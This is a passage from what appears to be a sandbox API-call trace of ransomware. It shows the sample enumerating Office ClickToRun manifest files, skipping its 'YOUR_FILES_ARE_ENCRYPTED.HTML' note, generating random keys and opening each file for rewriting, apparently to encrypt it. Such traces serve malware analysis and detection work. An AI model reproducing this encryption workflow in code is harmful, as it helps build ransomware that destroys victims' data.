returned 2 [0105.699] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="92") returned 2 [0105.699] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="D8") returned 2 [0105.699] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="54") returned 2 [0105.699] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="2D") returned 2 [0105.699] lstrcpyW (in: lpString1=0x314b0bc, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml" [0105.699] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x313b008, NumberOfConcurrentThreads=0x0) returned 0x274 [0105.700] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x313b008, lpOverlapped=0x313b008) returned 1 [0105.700] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82d4d28a, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x82d4d28a, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x6593d93a, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x2698, dwReserved0=0x19ec60, dwReserved1=0xe87ea9, cFileName="C2RManifest.osmuxmui.msi.16.en-us.xml", cAlternateFileName="C21C45~1.XML")) returned 1 [0105.706] StrStrIW (lpFirst="C2RManifest.osmuxmui.msi.16.en-us.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0105.706] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmuxmui.msi.16.en-us.xml") returned 116 [0105.706] PathFindExtensionW (pszPath="C2RManifest.osmuxmui.msi.16.en-us.xml") returned=".xml" [0105.706] lstrlenW (lpString=".xml") returned 4 [0105.707] PathFindExtensionW (pszPath="C2RManifest.osmuxmui.msi.16.en-us.xml") returned=".xml" [0105.707] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0105.707] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmuxmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmuxmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0105.707] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=9880) returned 1 [0105.707] GetProcessHeap () returned 0x600000 [0105.707] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x313b008 [0105.708] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="ED") returned 2 [0105.708] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="E9") returned 2 [0105.708] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="70") returned 2 [0105.708] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="7D") returned 2 [0105.708] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="D1") returned 2 [0105.708] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="6E") returned 2 [0105.708] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="2F") returned 2 [0105.708] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="75") returned 2 [0105.708] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="32") returned 2 [0105.708] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="67") returned 2 [0105.708] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="C8") returned 2 [0105.708] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="31") returned 2 [0105.708] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="92") returned 2 [0105.708] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="ED") returned 2 [0105.708] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="6D") returned 2 [0105.709] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="F4") returned 2 [0105.709] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="30") returned 2 [0105.709] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="86") returned 2 [0105.709] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="DB") returned 2 [0105.709] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="F3") returned 2 [0105.709] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="9D") returned 2 [0105.709] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="CF") returned 2 [0105.709] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="BB") returned 2 [0105.709] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="F3") returned 2 [0105.709] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="03") returned 2 [0105.709] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="74") returned 2 [0105.709] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="7C") returned 2 [0105.709] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="C7") returned 2 [0105.709] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="E7") returned 2 [0105.709] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="05") returned 2 [0105.709] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="23") returned 2 [0105.709] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="6A") returned 2 [0105.710] lstrcpyW (in: lpString1=0x314b0bc, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmuxmui.msi.16.en-us.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmuxmui.msi.16.en-us.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmuxmui.msi.16.en-us.xml" [0105.710] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x313b008, NumberOfConcurrentThreads=0x0) returned 0x274 [0105.710] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x313b008, lpOverlapped=0x313b008) returned 1 [0105.718] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82d47160, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x82d47160, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x65ec8648, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x16c9a, dwReserved0=0x19ec60, dwReserved1=0xe87ea9, cFileName="C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml", cAlternateFileName="C29151~1.XML")) returned 1 [0105.718] StrStrIW (lpFirst="C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0105.718] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml") returned 131 [0105.718] PathFindExtensionW (pszPath="C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml") returned=".xml" [0105.718] lstrlenW (lpString=".xml") returned 4 [0105.718] PathFindExtensionW (pszPath="C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml") returned=".xml" [0105.718] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0105.718] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.outlook.outlook.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0105.719] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=93338) returned 1 [0105.719] GetProcessHeap () returned 0x600000 [0105.719] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x313b008 [0105.722] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="56") returned 2 [0105.722] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="53") returned 2 [0105.722] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="8C") returned 2 [0105.722] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="CB") returned 2 [0105.722] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="85") returned 2 [0105.722] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="0B") returned 2 [0105.723] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="5F") returned 2 [0105.723] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="89") returned 2 [0105.723] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="A6") returned 2 [0105.723] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="94") returned 2 [0105.723] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="F1") returned 2 [0105.723] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="C4") returned 2 [0105.723] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="3C") returned 2 [0105.723] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="2F") returned 2 [0105.723] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="98") returned 2 [0105.723] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="F7") returned 2 [0105.723] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="16") returned 2 [0105.723] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="EA") returned 2 [0105.723] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="04") returned 2 [0105.723] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="7B") returned 2 [0105.723] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="02") returned 2 [0105.723] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="5B") returned 2 [0105.723] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="9E") returned 2 [0105.723] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="D2") returned 2 [0105.723] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="4D") returned 2 [0105.723] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="6A") returned 2 [0105.723] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="55") returned 2 [0105.723] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="D0") returned 2 [0105.723] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="EC") returned 2 [0105.723] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="90") returned 2 [0105.723] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="F4") returned 2 [0105.724] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="0F") returned 2 [0105.724] lstrcpyW (in: lpString1=0x314b0bc, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml" [0105.724] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x313b008, NumberOfConcurrentThreads=0x0) returned 0x274 [0105.724] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x313b008, lpOverlapped=0x313b008) returned 1 [0105.725] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82d39ab3, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x82d39ab3, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x65a5d95d, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x178c4, dwReserved0=0x19ec60, dwReserved1=0xe87ea9, cFileName="C2RManifest.outlookmui.msi.16.en-us.xml", cAlternateFileName="C2C4E2~1.XML")) returned 1 [0105.725] StrStrIW (lpFirst="C2RManifest.outlookmui.msi.16.en-us.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0105.725] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.outlookmui.msi.16.en-us.xml") returned 118 [0105.725] PathFindExtensionW (pszPath="C2RManifest.outlookmui.msi.16.en-us.xml") returned=".xml" [0105.727] lstrlenW (lpString=".xml") returned 4 [0105.727] PathFindExtensionW (pszPath="C2RManifest.outlookmui.msi.16.en-us.xml") returned=".xml" [0105.727] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0105.727] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.outlookmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.outlookmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0105.728] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=96452) returned 1 [0105.728] GetProcessHeap () returned 0x600000 [0105.728] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x6b47b0 [0105.731] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="89") returned 2 [0105.731] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="3E") returned 2 [0105.731] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="B2") returned 2 [0105.731] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="3C") returned 2 [0105.731] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="CA") returned 2 [0105.731] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="F9") returned 2 [0105.731] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="B3") returned 2 [0105.731] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="7C") returned 2 [0105.731] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="11") returned 2 [0105.731] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="00") returned 2 [0105.731] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="91") returned 2 [0105.731] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="63") returned 2 [0105.731] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="4D") returned 2 [0105.731] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="F9") returned 2 [0105.731] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="5E") returned 2 [0105.731] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="35") returned 2 [0105.732] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="23") returned 2 [0105.732] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="05") returned 2 [0105.732] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="84") returned 2 [0105.732] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="57") returned 2 [0105.732] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="23") returned 2 [0105.732] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="30") returned 2 [0105.732] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="B8") returned 2 [0105.732] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="02") returned 2 [0105.732] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="2E") returned 2 [0105.732] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="EA") returned 2 [0105.732] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="AD") returned 2 [0105.732] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="03") returned 2 [0105.732] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="FA") returned 2 [0105.732] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="D9") returned 2 [0105.732] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="10") returned 2 [0105.732] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="54") returned 2 [0105.733] lstrcpyW (in: lpString1=0x6c4864, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.outlookmui.msi.16.en-us.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.outlookmui.msi.16.en-us.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.outlookmui.msi.16.en-us.xml" [0105.733] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x274, CompletionKey=0x6b47b0, NumberOfConcurrentThreads=0x0) returned 0x274 [0105.733] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x6b47b0, lpOverlapped=0x6b47b0) returned 1 [0105.733] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82cc820c, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x82cc820c, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x6452e5d6, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0xadce8, dwReserved0=0x19ec60, dwReserved1=0xe87ea9, cFileName="C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml", cAlternateFileName="C280EB~1.XML")) returned 1 [0105.733] StrStrIW (lpFirst="C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0105.733] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml") returned 137 [0105.733] PathFindExtensionW (pszPath="C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml") returned=".xml" [0105.733] lstrlenW (lpString=".xml") returned 4 [0105.733] PathFindExtensionW (pszPath="C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml") returned=".xml" [0105.733] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0105.734] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpivot.powerpivot.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x314 [0105.734] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=711912) returned 1 [0105.734] GetProcessHeap () returned 0x600000 [0105.734] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3164a58 [0105.738] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="E5") returned 2 [0105.738] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="88") returned 2 [0105.738] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="9A") returned 2 [0105.738] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="30") returned 2 [0105.738] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="DD") returned 2 [0105.738] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="02") returned 2 [0105.738] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="95") returned 2 [0105.738] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="9D") returned 2 [0105.738] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="35") returned 2 [0105.738] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="1C") returned 2 [0105.738] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="FF") returned 2 [0105.761] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="51") returned 2 [0105.761] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="6A") returned 2 [0105.761] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="75") returned 2 [0105.761] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="E6") returned 2 [0105.761] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="62") returned 2 [0105.761] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="AA") returned 2 [0105.761] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="ED") returned 2 [0105.761] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="86") returned 2 [0105.761] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="DF") returned 2 [0105.761] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="B8") returned 2 [0105.762] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="60") returned 2 [0105.762] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="C5") returned 2 [0105.762] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="F8") returned 2 [0105.762] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="D9") returned 2 [0105.762] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="89") returned 2 [0105.762] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="72") returned 2 [0105.762] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="DB") returned 2 [0105.762] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="F4") returned 2 [0105.762] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="CC") returned 2 [0105.762] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="62") returned 2 [0105.762] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="36") returned 2 [0105.763] lstrcpyW (in: lpString1=0x3174b0c, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml" [0105.763] CreateIoCompletionPort (FileHandle=0x314, ExistingCompletionPort=0x274, CompletionKey=0x3164a58, NumberOfConcurrentThreads=0x0) returned 0x274 [0105.763] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3164a58, lpOverlapped=0x3164a58) returned 1 [0105.763] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82bf5a6e, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x82bf5a6e, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x64811bd3, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x19170, dwReserved0=0x19ec60, dwReserved1=0xe87ea9, cFileName="C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml", cAlternateFileName="C222CA~1.XML")) returned 1 [0105.763] StrStrIW (lpFirst="C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0105.763] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml") returned 137 [0105.763] PathFindExtensionW (pszPath="C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml") returned=".xml" [0105.765] lstrlenW (lpString=".xml") returned 4 [0105.765] PathFindExtensionW (pszPath="C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml") returned=".xml" [0105.765] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0105.765] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml" (normalized: 